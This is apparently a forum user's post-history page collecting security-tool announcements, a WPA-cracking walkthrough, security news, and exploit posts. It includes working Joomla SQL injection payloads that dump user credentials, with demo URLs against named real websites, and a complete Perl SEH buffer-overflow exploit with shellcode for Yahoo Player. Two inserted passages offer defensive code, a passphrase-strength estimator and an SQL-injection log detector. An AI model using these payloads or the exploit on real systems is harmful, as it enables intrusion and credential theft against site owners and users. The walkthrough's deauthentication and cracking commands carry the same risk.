Everything posted by begood
-
This is a client/server framework that wraps around a slightly modified version of John The Ripper. In contrast to the MPI version of John, dnetj allows the use of nodes which are of differing speeds and of nodes which do not run 24/7. This tool was written for a number of reasons: firstly, the MPI version requires an MPI installation on each node, and for the nodes to be configured together and be roughly the same speed. Also, although other distributed password crackers exist (such as djohn or medussa), they all have their own limitations.

The server loads a set of password hashes, and splits the available keyspace into "work units" of a configurable size. The clients connect and retrieve the hashes, as well as a set of work units to process. Once a client has processed some work units, it connects back to the server to submit the completed units as well as any passwords which have been cracked. Possible uses include, e.g., running as a background task on all the workstations in an office.

Note, this tool is at an early stage of development and is likely to be very buggy, although it is functional. Bug reports and/or patches are strongly encouraged.

Developer: John Anderson

Mailing List: There is a mailing list for Dnetj available; you can subscribe to it by writing a mail containing the word "subscribe" in the body of the mail, and sending it to john-mpi-subscribe@bindshell.net. As this list is currently fairly low traffic, it is shared with the john-mpi list.

Support: For support queries relating to dnetj, please use the mailing list. Do not contact the original authors of John The Ripper or use the public mailing lists on openwall.com for issues which are specific to the modified versions.
Supported Platforms
Dnetj has been tested on the following systems:
* Linux/x86
* Linux/amd64
* Linux/sparc
* MacOSX/PPC
* MacOSX/Intel
* Solaris/x86

Features
* Distributed client/server model; any number of clients can be supported and can be brought up and down at will
* Support for any cipher supported by John 1.7.2 (additional cipher patches should be able to be applied normally)
* Keeps the changes to John to a minimum, so that patches/updates can still be applied without too much fuss
* Uses the same optimized encryption routines as John
* Cracked hashes are stored in the standard john.pot format, so they can be displayed with john -show
* Passwd files sent to clients are sanitised (only the hash is sent; other fields from the passwd file are removed)
* Capability for auto client registration
* Code is intentionally kept clean to aid porting

Changes
* 0.2.5 - Initial public release

Known Issues
* Clients will sometimes crash if unable to connect to the server for a long period of time.
* Work unit size is limited to a 32-bit integer number of crypts (i.e. 4294967296).
* Node performance calculations wrap once the node has performed more than 4294967296 crypts, so nodes may appear to be much slower than they truly are.
* Doesn't work with NTLM, as the NTLM hash is stored in a different field of the passwd file.
* Traffic is sent in plain text (this makes debugging easier at this early stage of development).
* Makefile is very basic and has no configure script; compilation on Solaris requires adding -lnsl -lsocket to the compile command.

Download Latest Version
* dnetj-0.2.5.tar.gz (md5sum: 88a0270ef8579e977c77c1d73df5b702)

Download pre-compiled versions
None yet; if you'd like precompiled versions please let me know at the address above.

Documentation
There is currently a rudimentary "INSTALL" file located in the distribution archive. Better documentation will follow. In the meantime, please feel free to email for assistance.
Currently the client/server must be compiled separately from the bundled version of John. The source code to John is located in the src directory, and this can be compiled in the same way John is normally compiled. One caveat is that for a Dnetj server installation, the Makefile needs to be edited and -DMASTER added to the CFLAGS line. The client/server source is located in the "dist" subdirectory, and can be compiled with a simple "make". This will create 2 binaries, "client" and "server". The client or server binary should be moved to the "run" subdirectory, alongside the john binary. Also copy the file conf or conf-client into the run directory and edit it accordingly; most of the options within the configuration file are self-explanatory or explained by comments. To execute, start either the client or server with its corresponding configuration file as the first argument, e.g.:

./server conf
./client conf-client

BindShell.Net: Dnetj
-
Many security researchers are familiar with BeEF, a browser exploitation framework by Wade Alcorn. In short, BeEF is a program that brings together various types of code for taking advantage of known vulnerabilities in web browsers. If a target computer loads a certain bit of code within a web page, that code connects to a server control panel which can then execute certain attacks against the "zombie" machine. After noting potential security issues with the gadgets in Google Wave, I set about to finally set up a BeEF testbed and see if Google Wave was as capable a platform for malware delivery as I suspected. The picture above shows the results. I successfully created a Google Wave gadget that creates a new BeEF zombie whenever someone views the wave. This does not allow for the keylogger function of BeEF, but I did send an alert dialog (as shown) and used the Chrome DoS function to crash the browser tab. (I could also detect that the zombie machine had Flash installed; imagine the possibilities of using Flash or PDF exploits in an auto-loaded gadget.) What's even more disconcerting is that BeEF can integrate with Metasploit to potentially take over a victim's machine. I do not currently have Metasploit set up to test using Autopwn, but based on my experiences so far, I'm fairly confident such an attack would succeed.

All of these demonstrations about security and Google Wave point to four general weaknesses in Wave's current structure:
1. Allowing scripts and iframes in gadgets with no limits apart from sandboxing
2. Lack of control over what content or users can be added to a wave
3. No simple mechanism for verifying gadget sources or features
4. Automatically loading gadgets when a wave is viewed

Any one of these issues would be cause for concern, but taken together they present such alarming possibilities as a user getting their computer hacked simply by viewing a wave.
Whatever may be said about Google Wave's usefulness, I have to conclude that the product is not ready for prime time until these types of problems are addressed.

More info: Google Wave as a Tool for Hacking | Social Hacking
More info on BeEF (rstcenter.com): http://rstcenter.com/forum/20971-beef-browser-exploitation-framework.rst
-
BeEF is a browser exploitation framework. This tool will demonstrate the collecting of zombie browsers and browser vulnerabilities in real time. It provides a command and control interface which facilitates the targeting of individual or groups of zombie browsers.

Enhancements in the latest version include:
* Integration with Metasploit via XMLRPC
* Mozilla extension exploitation support
* New browser functionality detection modules
* Tiered logging for module actions and results

BeEF provides an easily integrable framework that demonstrates the impact of browser and Cross-site Scripting issues in real time. Development has focused on creating a modular framework. This has made module development a very quick and simple process. Current modules include metasploit, port scanning, keylogging, TOR detection and more.

Download: http://www.bindshell.net/tools/beef/beef-latest.tar.gz
(rst) video tutorial: http://rstcenter.com/forum/20974-browser-exploitation-framework-beef.rst
-
By now, pretty much everyone has heard that it is easy to hack into WEP protected networks. As we have seen in our Cracking WEP article, it is terribly easy. (There have been advances in cracking WEP since that article was published; it is even easier now.) Yeah, WiFi is inherently insecure, but we need it... Right? Well, if you ask your local security guy how you can protect your home WiFi network, surely they will come back and say: "WPA or WPA2 cannot be cracked, use it". They are wrong. By simply installing a patch to your existing hardware, WPA came in as the "Saving Grace" for wireless networking. It corrected almost every security problem either created or ignored by WEP. However, WPA was not perfect. The method in which WPA initializes its encryption scheme is subject to capture and offline brute force attacks. Consequently, it's actually easier to crack WPA which uses a weak password than it is to crack WEP. This article will walk you through the process of retrieving and cracking a WPA network key.

In this guide I will skim over some of the powerful things that you can do with graphics cards. By focusing on my personal setup, you will see it can be done with limited off-the-shelf equipment. The first decision is to decide what you want your setup to be. I personally chose to go with a setup using a GeForce card with CUDA support (CUDA GPUs). You will need to check on the programs you want to use to make sure that they support the graphics card that you choose. The setup I ultimately decided to go with is an EVGA 780i motherboard that has dual SLI support (can support tri SLI). I ended up going with two GeForce GTX260 cards to utilize the SLI capability. I also upgraded my power supply to a Corsair 850W to power everything in my machine. After building the setup, feel free to go play some games, then come back to this guide. I mean you have work to do! The BackTrack 4 Pre-Release is a perfect platform for you to have some fun with your new setup.
For a guide on configuring Backtrack 4 with CUDA and an in-depth tutorial on CUDA tools, check out this 25 page guide on it by Pureh@te on the offensive-security website. Finally, let's take a look at my favorite GPU tool Pyrit, which will allow you to run a pass-through dictionary attack against WPA encryption (pyrit - Project Hosting on Google Code), running it through coWPatty (coWPAtty - Attacking WPA/WPA2-PSK Exchanges). Using this you can take a capture file with a WPA 4-way handshake and do a pass-through to try to crack it with your dictionary using coWPatty. Make sure you use a dictionary with words in length starting from 8 and ending in 63 letters long. Any longer or shorter is just a waste because of the requirements of WPA passphrases. One thing to keep in mind is that to be able to crack the passphrase you must have the passphrase in your dictionary file.

The first step will be to put your card into monitor mode. After that, fire up airodump. I happen to know the router BSSID and channel, so here is what I did below.

airodump-ng -c (router's channel) --bssid (router's bssid) -w (cap filename) interface

Airodump will then load up as shown below. You can see the router and data coming from it. You can see a client is connected, which is important since you will need to get the 4-way handshake to crack the WPA passphrase. Next it is time to send a de-authentication packet to the client to make it reconnect to the router, allowing you to grab that 4-way handshake.

aireplay-ng -0 (de-authentication attack) 5 (number of de-authentication packets to send) -a (router bssid) -c (client essid) interface

If all goes well, you will see in your airodump window, in the top right corner, that you have received a WPA handshake. I have circled it in red below. If you don't see this, just repeat the last step and de-authenticate the client again. After that I like to make sure that my graphics cards are working properly. You can either run a benchmark or list cores in pyrit.
In the below picture I show the benchmark option.

To run benchmark: pyrit benchmark
To list cores: pyrit list_cores

Below is the command for running pyrit in a pass-through mode through coWPatty. The great thing about this is you can run it with your dictionary file and not mess around with making a rainbow table or anything. If you do not have a dictionary file for WPA, you can grab one from the backtrack repository. The command is as follows for the pass-through mode:

pyrit -e (router essid) -f (path to the dictionary file) passthrough | (path to coWPatty) -d - -s (router essid) -r (name of capture file)

Note: I had installed the latest version of coWPatty manually. The default location you would put after the pipe (|) in backtrack would be /pentest/wireless/cowpatty/cowpatty

If all goes well, you will start to see it go through passphrases in your dictionary file as shown below. It was able to run 15,479.28 passphrases per second, which is an amazing upgrade from the 300 something I was getting with my 2.0 GHz dual core processor. This is also using the stock graphics cards that are not over-clocked.

Credits / Tools used:
Backtrack - http://www.remote-exploit.org/backtrack.html
Pyrit - pyrit - Project Hosting on Google Code
Cowpatty - coWPAtty - Attacking WPA/WPA2-PSK Exchanges
Special thanks to Pureh@te / Offensive Security for the great guide on getting graphics cards set up in backtrack - http://www.offensive-security.com/documentation/backtrack-4-cuda-guide.pdf

Last Updated (Tuesday, 04 August 2009)
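Added example, not from the post above and not code from the Pyrit or coWPAtty projects: the PBKDF2 step those tools repeat for every dictionary word (802.11i derives the pairwise master key from the passphrase with the SSID as salt), followed by a worst-case time estimate at the 15,479.28 passphrases/second figure the post quotes. The passphrase policies in the table are assumptions chosen for illustration.

```python
import hashlib
import math

# Throughput quoted in the post for two stock GTX260 cards (passphrases/second).
CRACK_RATE = 15479.28
# 802.11i fixes PBKDF2-HMAC-SHA1 at 4096 rounds producing a 256-bit PMK.
PBKDF2_ROUNDS = 4096
PMK_LEN = 32


def is_valid_passphrase(passphrase: str) -> bool:
    """WPA-PSK passphrases are 8 to 63 printable ASCII characters; that is
    why the post says dictionary words outside that range are wasted."""
    return 8 <= len(passphrase) <= 63 and all(32 <= ord(c) <= 126 for c in passphrase)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).
    The SSID is the salt, which is why a pass-through run (or any
    precomputed table) is bound to one network name."""
    if not is_valid_passphrase(passphrase):
        raise ValueError("passphrase must be 8..63 printable ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ROUNDS, PMK_LEN)


def seconds_to_exhaust(alphabet_size: int, length: int, rate: float = CRACK_RATE) -> float:
    """Worst-case seconds to try every passphrase of exactly `length`
    characters drawn from `alphabet_size` symbols at `rate` guesses/second."""
    return alphabet_size ** length / rate


def worst_case_days(rate: float = CRACK_RATE) -> dict:
    """Illustrative passphrase policies (assumed, not from the post) measured
    against the quoted GPU throughput, in days."""
    policies = {
        "8 lowercase letters": (26, 8),
        "8 mixed-case alphanumerics": (62, 8),
        "12 mixed-case alphanumerics": (62, 12),
        "20 printable ASCII": (95, 20),
    }
    return {name: seconds_to_exhaust(a, n, rate) / 86400
            for name, (a, n) in policies.items()}


if __name__ == "__main__":
    # 802.11i Annex H test vector: passphrase "password", SSID "IEEE".
    print("PMK:", derive_pmk("password", "IEEE").hex())
    for name, days in worst_case_days().items():
        print(f"{name:28s} {days:12.3e} days  ({math.log2(days * 86400 * CRACK_RATE):.1f} bits)")
```

The table makes the post's own point from the defender's side: a short dictionary word falls in hours, while a long random passphrase pushes the same GPU rig past any useful horizon.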
-
The Matriux is a phenomenon that was waiting to happen. It is a fully featured security distribution consisting of a bunch of powerful, open source and free tools that can be used for various purposes including, but not limited to, penetration testing, ethical hacking, system and network administration, cyber forensics investigations, security testing, vulnerability analysis, and much more. It is a distribution designed for security enthusiasts and professionals, although it can be used normally as your default desktop system. With Matriux, you can turn any system into a powerful penetration testing toolkit, without having to install any software onto your hard disk. Matriux is designed to run from a Live environment like a CD / DVD or USB stick, or it can easily be installed to your hard disk in a few steps. Matriux also includes a set of computer forensics and data recovery tools that can be used for forensic analysis and investigations and data retrieval. The Matriux Arsenal contains a huge collection of the most powerful and versatile security and penetration testing tools.
The Matriux Arsenal includes the following tools / utilities / libraries (the ßeta release will contain only a few of the listed tools):

- Reconnaissance
  - DNS: DIG, DNSBruteForce, DNSTracer, DNSWalk
  - HTTrack: HTTrack, WebHTTrack Website Copier, Browse Mirrored Websites, Chaosreader, Deepmagic Information Gathering Tool, dsniff password sniffer, EtherApe, tcpdump, tcpslice, tcptrace, tcptracert, Network Analyzer (Wireshark), xtrace
- Scanning
  - BATMAN-Tools: batping, batroute, batdump
  - Cisco: CDP Packet Generator, HSRP Generator
  - Routing-Protocols: Autonomous System Scanner, IGRP Route Injector
  - Web-Scanners: Nikto, Angry IP Scan, CryptCat, ettercap console, Ettercap Gui, file2cable, Web Server Fingerprinting Tool, icmpush, icmpquery, IRDP Packet Sender, IRDP Responder Packet Sender, Netcat, netenum, netmask, Nmap, Paris Traceroute, Protocol Scanner, Parallel Internet Measurement Utility, tctrace, THC-Amap, The Network Mapper Front End
- Gain Access (Attack Tools)
  - Brute-Force: BruteSSH
  - Password: crunch, md5-utils, Mac Changer
- Framework
  - Fast-Track: Fast Track Console Mode, FT-Interactive Menu, Fast Track Gui
  - Inguma: Inguma-cli, Inguma-gui
  - Metasploit Framework 2: msf2-cli, msf2-console, msf2-update, msf2-web, msf2-web console v2.7
  - Metasploit Framework 3: msf3-cli, msf3-console, msf3-gui, msf3-web, msf3-web console v3.2, Grendel-Scan, HTTP Request Exploit Framework, WebSecurify, WSFuzzer
- Radio
  - Bluetooth: haraldscan
  - Wireless 802.11: airbase-ng, aircrack-ng, airdecap-ng, airdecloak-ng, airdriver-ng, aireplay-ng, airmon-ng, airodump-ng, airolib-ng, airserv-ng, airtun-ng, buddy-ng, easside-ng, packetforge-ng, tkiptun-ng, wesside-ng, WiFi Radar
- Digital-Forensics
  - Acquisition: Automated Image & Restore 1.28, Guymager
  - Analysis: Start Autopsy, Autopsy Forensics Browser, Gpart, Pasco, Vinetto, Start WarVOX, Open WarVOX Web Interface, Xplico Console Mode (Internet Traffic Decoder), Xplico Web Interface (Internet Traffic Decoder), Dhash
  - Debugger: Crash, e2dbg, efence, JavaScript Lint, valgrind
  - Tracer
    - Leak-Tracer: Leak Analyze, Leak Check, etrace, ltrace, pstack, strace
- And more ...

Minimum System Requirements

And don't throw away your old computers; Matriux can turn them into a powerful system. The minimum system requirements for running a Matriux lite edition:
* Intel-compatible CPU (i486 or later)
* 32 MB of RAM for text mode, at least 96 MB for graphics mode with KDE (128 MB of RAM is recommended to use the various office products)
* bootable CD-ROM drive, or a boot floppy and standard CD-ROM (IDE/ATAPI or SCSI)
* standard SVGA-compatible graphics card
* serial or PS/2 standard mouse or IMPS/2-compatible USB mouse

Downloads Details
* Matriux "Lithium" 0.9.4 - beta1 (2009.11.27) :: [ md5=f200b17d4f9ba97672516dbeaf13f533 ]
  o Mirrors: Temporary - iXsplit
  o Torrents: isoHunt
-
# Title : Joomla Component com_party SQL Injection Vulnerability
# Author: DevilZ TM
# Date : 2010-03-14
[~]######################################### InformatioN #############################################[~]
[~] Title : Joomla Component com_party SQL Injection Vulnerability
[~] Author : DevilZ TM By D3v1l
[~] Homepage : http://www.DEVILZTM.com
[~] Contact : DevilZTM@Gmail.CoM & D3v1l.blackhat@yahoo.com
[~]######################################### ExploiT #################################################[~]
[~] Vulnerable File : http://127.0.0.1/index.php?option=com_party&view=party&task=details&id=[SQL]
[~] ExploiT : -1/**/UNION/**/SELECT/**/1/**/FROM/**/jos_users/*
[~] Example : http://127.0.0.1/index.php?option=com_party&view=party&task=details&id=-1/**/UNION/**/SELECT/**/1/**/FROM/**/jos_users/*
[~] Demo : http://www.bollywoodvillage.com/index.php?option=com_party&view=party&task=details&id=-1/**/UNION/**/SELECT/**/1/**/FROM/**/jos_users/*
[~]######################################### ThankS To ... ############################################[~]
[~] Special Thanks To My Best FriendS : Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
[~] IRANIAN Young HackerZ
[~]######################################## FinisH #################################################[~]
-
# Title : Joomla Component com_color SQL Injection Vulnerability
# Author: DevilZ TM
# Date : 2010-03-14
[~]######################################### InformatioN #############################################[~]
[~] Title : Joomla Component com_color SQL Injection Vulnerability
[~] Author : DevilZ TM By D3v1l
[~] Homepage : http://www.DEVILZTM.com
[~] Contact : DevilZTM@Gmail.CoM & D3v1l.blackhat@yahoo.com
[~]######################################### ExploiT #################################################[~]
[~] Vulnerable File : http://127.0.0.1/index.php?option=com_color&view=color&l=[SQL]
[~] ExploiT : -1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**/FROM/**/jos_users/*
[~] Example : http://127.0.0.1/index.php?option=com_blog&task=viewdetails&id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**/FROM/**/jos_users/*
[~] Demo : http://sudokugame.altervista.org/index.php?option=com_color&view=color&l=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(username,0xa,password),6,7,8/**/FROM/**/jos_users/*
[~]######################################### ThankS To ... ############################################[~]
[~] Special Thanks To My Best FriendS : Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
[~] IRANIAN Young HackerZ
[~]######################################## FinisH #################################################[~]
-
# Title : Joomla com_products 'intCategoryId' Remote Sql Injection Vulnerability
# Date : 2010-03-11
# Author : N2n-Hacker
# Script: [Joomla]--
# Founder: [ N2n-Hacker -- Email: 2nd@live.fr ]--
==============================================================================
\\\\\\\\\\ Joomla com_about 'intCategoryId' Remote Sql Injection Vulnerability /////////
==============================================================================
***************************************************************************
Dork = inurl:com_products "intCategoryId"
###########################################################################
===[ Exploit ]===
=> http://website/index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,group_concat(username,0x3a,password,0x3a,email),4,5,6,7,8+from+jos_users&op=category_details
or
=> http://website/index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,group_concat(username,0x3a,password,0x3a,email),4,5,6,7,8+from+mos_users&op=category_details
###########################################################################
My Bad Life
###########################################################################
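Added example, not part of the three Joomla advisories above (com_party, com_color and com_products): a small detector for the comment-padded and mixed-case UNION SELECT payloads they show, run over constructed Apache access-log lines. The client addresses, timestamps and log lines are made up for the demonstration; the query strings mirror the advisories' own payloads as a web server would log them.

```python
import re
from urllib.parse import unquote_plus

# Apache combined-log prefix: client, identd, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# After normalisation every payload in the advisories reduces to "union select".
UNION_SELECT_RE = re.compile(r"\bunion\b(?:\s+all)?\s+select\b")
# Both Joomla user-table names the advisories enumerate.
JOOMLA_USERS_RE = re.compile(r"\b(?:jos|mos)_users\b")
# A negative id forcing an empty first result set is the classic UNION setup.
NEGATIVE_ID_RE = re.compile(r"\b[a-z_]*id=-\d+")


def normalise_query(raw_query: str) -> str:
    """Undo the obfuscation used in the advisories: %xx and '+' encoding,
    '/**/' inline comments standing in for spaces, runs of whitespace, case."""
    decoded = unquote_plus(raw_query)
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)   # '/**/' comment padding -> space
    decoded = re.sub(r"\s+", " ", decoded)
    return decoded.lower()


def classify_request(path: str) -> list:
    """Return the indicator names found in a request path's query string."""
    if "?" not in path:
        return []
    query = normalise_query(path.split("?", 1)[1])
    found = []
    if UNION_SELECT_RE.search(query):
        found.append("union-select")
    if JOOMLA_USERS_RE.search(query):
        found.append("joomla-users-table")
    if NEGATIVE_ID_RE.search(query):
        found.append("negative-id")
    return found


def scan_log(lines) -> list:
    """Return (ip, path, indicators) for every parseable line carrying at
    least one indicator; lines that do not parse as access-log entries are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        indicators = classify_request(m.group("path"))
        if indicators:
            hits.append((m.group("ip"), m.group("path"), indicators))
    return hits


# Constructed sample log: the three advisory payloads as a server would log
# them (spaces URL-encoded), one benign Joomla request, one malformed line.
SAMPLE_LOG = [
    '127.0.0.1 - - [14/Mar/2010:10:21:33 +0000] "GET /index.php?option=com_party&view=party&task=details&id=-1/**/UNION/**/SELECT/**/1/**/FROM/**/jos_users/* HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [14/Mar/2010:10:22:07 +0000] "GET /index.php?option=com_color&view=color&l=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(username,0xa,password),6,7,8/**/FROM/**/jos_users/* HTTP/1.1" 200 4410 "-" "curl/7.19"',
    '192.0.2.9 - - [11/Mar/2010:23:05:41 +0000] "GET /index.php?option=com_products&intCategoryId=-222%20UnIon%20SelEct%201,2,group_concat(username,0x3a,password,0x3a,email),4,5,6,7,8+from+mos_users&op=category_details HTTP/1.1" 200 7002 "-" "Mozilla/4.0"',
    '198.51.100.4 - - [14/Mar/2010:10:30:00 +0000] "GET /index.php?option=com_content&view=article&id=42 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    'not an access log line at all',
]

if __name__ == "__main__":
    for ip, path, indicators in scan_log(SAMPLE_LOG):
        print(ip, ",".join(indicators), path)
```

Note that all three payloads returned HTTP 200 in the constructed sample, so a status-code filter alone would miss them; the comment stripping is what makes the `/**/` variants match the same rule as the `%20` variant.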
-
VideoJak is the industry's first tool for simulating denial-of-service (DoS) attacks that can disrupt IP video communications in today's leading edge Unified Communications deployments. VideoJak illustrates how an attacker can launch a targeted DoS attack that flies under the radar of typical security measures, interfering with only the communications stream associated with the video traffic. A sister tool to UCSniff, VideoJak lists the following features:
* Automatic VLAN Hop and VLAN Discovery
* MitM ARP Poisoning
* Interception of SCCP Video signaling messages
* Selection of IP Video calls from multiple calls in progress using a menu interface
* Automatic creation of custom Video payload based on private IP Video call
* Targeted DoS against specific IP Video phone / extension during a call session

» Download VideoJak
VideoJak: Hi Jacking IP Video Systems
-
UCSniff 2.0 breaks new ground in open source security assessment tools with the introduction of the industry's first IP video security assessment features. Like the original UCSniff, UCSniff enables IT managers and security practitioners to test their UC infrastructure for vulnerabilities that can lead to the unauthorized interception and recording of UC traffic, or targeted eavesdropping. Written in C, and initially released for Linux systems, the software is freely available for anyone to download, under the GPLv3 license.
* Extends UCSniff's targeted user eavesdropping functionality to encompass IP video communications, including phone-to-phone video conferencing
* Support for SCCP and RFC 3261 SIP
* Automatic decode and re-construction of H.264 video codec
* Automatically captures and saves video conference, into two separate AVI format video files, so that the security professional can see what both end users of the Video conference see
* Reconstructs entire voice conversation into a separate, single WAV file format file

The existing features of UCSniff have been further tested and improved upon, including several bug fixes:
* In Learning mode, dynamically updates the IP address of phone in the event that IP address changes after phone reboot or via DHCP
* Allows targeting of VoIP users based on corporate directory and/or extensions
* Tracking, interception, and logging of signaling messages used for authentication to voice mail systems
* Automatically captures and saves entire voice conversations to a single file that can be played back by media players
* Support for G.722 and g.711 u-law compression codecs
* Automated VLAN Hop and VLAN Discovery support
* A VoIP Sniffer combined with a MitM redirection tool
* Monitor Mode (like Wireshark)
* Sniffs entire conversation even if only one phone is in source VLAN
* Enhanced capability to ARP Poison hosts that have Gratuitous ARP Disabled

» Download UCSniff 2.0
UCSniff IP Video Sniffer
-
About four months ago I developed a reliable exploit for vulnerability CVE-2008-3531, which is also addressed in the advisory FreeBSD-SA-08:08.nmount. In this post I will use this vulnerability to provide an overview of the development process for FreeBSD kernel stack exploits. CVE-2008-3531 is a kernel stack overflow vulnerability that affects FreeBSD versions 7.0-RELEASE and 7.0-STABLE, but not 7.1-RELEASE nor 7.1-STABLE as the CVE entry seems to suggest. read it all here : CVE-2008-3531: FreeBSD kernel stack overflow exploit development argp's blog
-
The takedown of 100 servers used to control Zeus-related botnets may be a short-lived victory, security researchers said after discovering that about one-third of the orphaned channels were able to regain connectivity in less than 48 hours. The resurrection of at least 30 command and control channels came after their internet service provider found a new upstream provider to provide connectivity to the outside world, autonomous system records showed on Thursday. As a result, some of the rogue customers who used the Troyak ISP to herd huge numbers of infected PCs were able to once again connect to the compromised machines and issue commands. "The problem is that as soon the C&Cs are reachable from the internet again, the cybercriminals can regain the control of their botnet and can safely move the stolen data away from those AS's to a safer place or to a backup server," a researcher connected to the Zeus Tracker service told The Register. "Very bad." One example of a severed server that was able to reconnect was this one. In all, about 100 of the 249 C&C servers Zeus Tracker monitored lost connectivity. Since then, 30 have been able to reconnect. The researcher, who asked not to be identified by name, said he expected more of the malicious servers will reconnect over time. The resurrections are in many cases the result of Troyak being reconnected by upstream provider RTCOMM-AS of Moscow. As previously reported, Troyak was completely severed from the net when its previous providers, Ukraine-based Ihome and Russia-based Oversun Mercury, suddenly "de-peered" their customer. Troyak's resiliency demonstrates the whack-a-mole nature of internet takedowns, in which alleged bad guys are able to quickly come back online by switching to a new provider. For their part, Troyak principals characterized the de-peering as the result of an inadvertent failure to pay bills on time, rather than a termination based on the customers it served. 
"We will provide more attention to the payment for our upstreams in time," Roman Starchenko wrote in an email to The Register. "I know, some of clients of our service might be used for something you called 'botnet'. Anyway, we did not receive any letter from any officials of our country, so will not perform any actions as our law said." ® source
-
[local] Yahoo Player v1.0 (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)
begood replied to begood's topic in Exploituri
replace with your own shellcode. or just plain fuckin google. -
The most secure encryption method has been cracked!
begood replied to Gonzalez's topic in Stiri securitate
I wonder why nothing is perfect? Maybe "they" introduced a vulnerability? (paranoia^ ; srsly, they're just plain stupid.) -
# Title: Yahoo Player v1.0 (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)
# EDB-ID: 11647
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Mr.tro0oqy
# Published: 2010-03-07
# Verified: yes
# Download Vulnerable app

#!/usr/bin/perl
print qq (
################################################################
#Yahoo Player 1.0 (.m3u/.pls/.ypl) Local Buffer Overflow Exploit (SEH)
#by Mr.tro0oqy from yemen
#geertz: Red-D3v1L , his0k4 ,Stack
################################################################
);
my $bof="\x41" x 2076;          # padding up to the SEH record
my $nsh="\xEB\x06\x90\x90";     #Short jmp (next SEH pointer)
my $seh="\x5D\x38\x82\x7C";     #KERNEL32.DLL (SEH handler address)
my $nop="\x90" x 20;            # nop sled before the payload
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
print $bof.$nsh.$seh.$nop.$sec;
###################################################################
open(myfile,'>> tro0oqy.m3u') or die "cannot open tro0oqy.m3u: $!";
print myfile $bof.$nsh.$seh.$nop.$sec;
close(myfile);
###################################################################
-
The most secure encryption method has been cracked!
begood replied to Gonzalez's topic in Stiri securitate
old news btw, RSA-2048 also exists, so.. -
PayPal has finally made good on its pledge to restore Cryptome's account many hours after the firm's head of global communications told Register readers it had already done so. PayPal told operator John Young the account had been suspended because of its stated policy: Cryptome welcomes documents for publication that are prohibited by governments worldwide, in particular material on freedom of expression, privacy, cryptology, dual-use technologies, national security, intelligence, and secret governance -- open, secret and classified documents -- but not limited to those. Documents are removed from this site only by order served directly by a US court having jurisdiction. No court order has ever been served; any order served will be published here -- or elsewhere if gagged by order. Bluffs will be published if comical but otherwise ignored. Cryptome predates Wikileaks by a decade. PayPal told Young the restrictions would continue, with Cryptome unable to withdraw funds or close the account. Earlier PayPal's head of global communications had implied in an email to El Reg that Cryptome breached its policy that an account not be used "to encourage, promote, facilitate or instruct" others to engage in illegal activity. The email also stated the account had been restored. It hadn't. Eventually, some nine hours after contacting Cryptome, PayPal did restore the account, "after review". "Likely another PayPal ploy, hoping the FU will just go away, without apology, without admission of stupidity, declaring everything was done as it should have 